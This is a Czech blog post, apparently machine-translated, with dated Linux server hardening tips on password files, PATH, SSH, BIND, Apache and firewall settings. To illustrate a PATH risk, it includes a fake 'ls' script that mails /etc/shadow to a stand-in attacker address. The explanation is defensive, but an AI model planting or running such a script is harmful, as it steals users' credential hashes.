Na blogu jsem dlouho nic nepublikoval a rád bych se s vámi podělil o několik rad převzatých z knihy, která (mimo jiné). Našel jsem to na univerzitě a jen jsem četl, a přestože je to upřímně trochu zastaralé a ukázané techniky jsou velmi nepravděpodobné, že budou fungovat vzhledem k vývoji systému, jsou to také zajímavé aspekty, které lze ukázat.
Chci objasnit, že se jedná o rady zaměřené na systém Linux, který se používá jako server, ve středním nebo snad ve velkém měřítku, protože na uživatelské úrovni pro stolní počítače, i když je lze použít, by nebyly příliš užitečné.
Varuji také, že se jedná o jednoduché rychlé tipy a nebudu zacházet do podrobností, i když mám v plánu udělat další, mnohem konkrétnější a obsáhlejší příspěvek k určitému tématu. Ale to uvidím později. Začněme.
Zásady hesla.
I když to zní jako frázová fráze, dobrá politika hesel dělá rozdíl mezi zranitelným systémem nebo ne. Útoky, jako je „hrubá síla“, využívají špatného hesla pro přístup do systému. Nejběžnější tipy jsou:
- Kombinujte velká a malá písmena.
- Používejte speciální znaky.
- Čísla.
- Více než 6 číslic (doufejme, že více než 8).
Kromě toho zvažte dva základní soubory. / etc / passwd a / etc / shadow.
Něco velmi důležitého je ten soubor / etc / passwd. Kromě toho, že nám dáte jméno uživatele, jeho uid, cestu ke složce, bash .. atd. v některých případech také zobrazuje zašifrovaný klíč uživatele.
Podívejme se na jeho typické složení.
desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash
uživatel: cryptkey: uid: gid: cesta :: cesta: bash
Skutečným problémem zde je, že tento konkrétní soubor má oprávnění -rw-r - r– což znamená, že má oprávnění ke čtení pro libovolného uživatele v systému. a mít zašifrovaný klíč není příliš obtížné dešifrovat ten skutečný.
Proto soubor existuje / etc / shadow. Toto je soubor, kde jsou mimo jiné uloženy všechny uživatelské klíče. Tento soubor má potřebná oprávnění, aby jej žádný uživatel nemohl číst.
Abychom to napravili, musíme přejít do souboru / etc / passwd a změnit šifrovaný klíč na „x“, uloží se pouze klíč do našeho souboru / etc / shadow.
desdelinux:x:500:501::/home/usuario1:/bin/bash
Problémy s PATH a .bashrc a dalšími.
Když uživatel provede příkaz ve své konzole, skořápka vyhledá tento příkaz v seznamu adresářů obsaženém v proměnné prostředí PATH.
Pokud do konzoly zadáte „echo $ PATH“, bude mít výstup něco takového.
.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin
Každá z těchto složek je místem, kde shell vyhledá napsaný příkaz k jeho provedení. On "." to znamená, že první složka, která má být vyhledána, je stejná složka, ze které je spuštěn příkaz.
Předpokládejme, že existuje uživatel „Carlos“ a tento uživatel chce „dělat zlo“. Tento uživatel může ve své hlavní složce ponechat soubor s názvem „ls“ a v tomto souboru spustit příkaz jako:
#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls
A pokud se uživatel root pro věci v cíli pokusí vypsat složky ve složce carlos (protože nejprve hledá příkaz ve stejné složce, nechtěně by odeslal soubor s hesly na tento e-mail a poté složky bude uveden a nezjistí to příliš pozdě.
Abychom tomu zabránili, musíme odstranit „.“ proměnné PATH.
Stejným způsobem by měly být zkontrolovány soubory jako /.bashrc, /.bashrc_profile, ./.login a zkontrolovat, zda neexistuje žádný znak „.“ v proměnné PATH a ve skutečnosti z takových souborů můžete změnit cíl konkrétního příkazu.
Tipy se službami:
SHH
- Zakažte verzi 1 protokolu ssh v souboru sshd_config.
- Nedovolte, aby se uživatel root přihlašoval pomocí ssh.
- Soubory a složky ssh_host_key, ssh_host_dsa_key a ssh_host_rsa_key by měl číst pouze uživatel root.
SVÁZAT
- Změňte uvítací zprávu v souboru named.conf tak, aby nezobrazovala číslo verze
- Omezte přenosy zón a povolte je pouze týmům, které to potřebují.
Apache
- Zabraňte službě v zobrazení vaší verze v uvítací zprávě. Upravte soubor httpd.conf a přidejte nebo upravte řádky:
ServerSignature Off
ServerTokens Prod
- Zakázat automatické indexování
- Nakonfigurujte apache tak, aby nezobrazoval citlivé soubory jako .htacces, * .inc, * .jsp .. atd
- Odeberte ze stránky manuálové stránky nebo ukázku
- Spusťte apache v chrootovaném prostředí
Zabezpečení sítě.
Je nezbytné pokrýt všechny možné položky do vašeho systému z externí sítě, zde je několik základních tipů, jak zabránit vetřelcům ve skenování a získávání informací z vaší sítě.
Blokovat přenos ICMP
Firewall musí být nakonfigurován tak, aby blokoval veškerý příchozí a odchozí přenos ICMP a echo odpovědi. Tím se vyhnete tomu, že vás například vyhledá skener, který hledá živé zařízení v řadě IP adres.
Vyhněte se skenování ping pomocí protokolu TCP.
Jedním ze způsobů, jak zkontrolovat váš systém, je skenování pomocí protokolu ping TCP. Předpokládejme, že na vašem serveru je server Apache na portu 80. Vetřelec by mohl na tento port odeslat požadavek ACK. S tímto, pokud systém odpoví, bude počítač naživu a prohledá zbytek portů.
Za tímto účelem by měla mít brána firewall vždy možnost „informovanost o stavu“ a měla by zahodit všechny pakety ACK, které neodpovídají již vytvořenému připojení nebo relaci TCP.
Několik dalších tipů:
- Použijte systémy IDS k detekci skenování portů do vaší sítě.
- Nakonfigurujte bránu firewall tak, aby nedůvěřovala nastavení zdrojového portu připojení.
Důvodem je, že některé kontroly používají „falešný“ zdrojový port, například 20 nebo 53, protože mnoho systémů těmto portům důvěřuje, protože jsou typické pro ftp nebo DNS.
POZNÁMKA: Pamatujte, že většina problémů uvedených v tomto příspěvku již byla vyřešena téměř ve všech současných distribucích. Nikdy však neuškodí mít klíčové informace o těchto nepříjemnostech, aby se vám nestaly.
POZNÁMKA: Později uvidím konkrétní téma a vytvořím příspěvek s mnohem podrobnějšími a aktuálními informacemi.
Děkuje všem za čtení.
Zdravím.
Článek se mi opravdu líbil a téma mě zajímá, doporučuji vám pokračovat v nahrávání obsahu.